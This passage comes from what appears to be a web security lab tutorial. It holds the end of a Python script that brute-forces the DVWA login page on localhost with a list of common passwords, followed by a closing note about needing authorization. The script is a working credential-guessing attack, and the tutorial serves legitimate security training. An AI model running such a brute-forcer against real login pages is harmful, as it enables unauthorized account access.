                print(f"[*] Redirect to: {response.headers.get('Location')}")
                break
            elif 'welcome' in response.text.lower() or 'dashboard' in response.text.lower():
                print(f"[✓] SUCCESS! Password: {password}")
                break
            elif 'incorrect' in response.text.lower() or 'invalid' in response.text.lower():
                print(f"[-] Failed: {password}")
            else:
                print(f"[?] Unknown response for: {password} (status: {response.status_code})")

            # Rate limiting
            time.sleep(0.5)  # 500ms between attempts

        except Exception as e:
            print(f"[!] Error with password '{password}': {e}")


# Usage
if __name__ == '__main__':
    passwords = ['password', '123456', 'admin', 'letmein', 'welcome']
    bruteforce_login('http://localhost/dvwa/login.php', 'admin', passwords)
```
🎯 Lab Complete! You've built professional web security testing tools. These techniques are used daily by penetration testers, bug bounty hunters, and security researchers. Always remember: authorization is required before testing any system you don't own.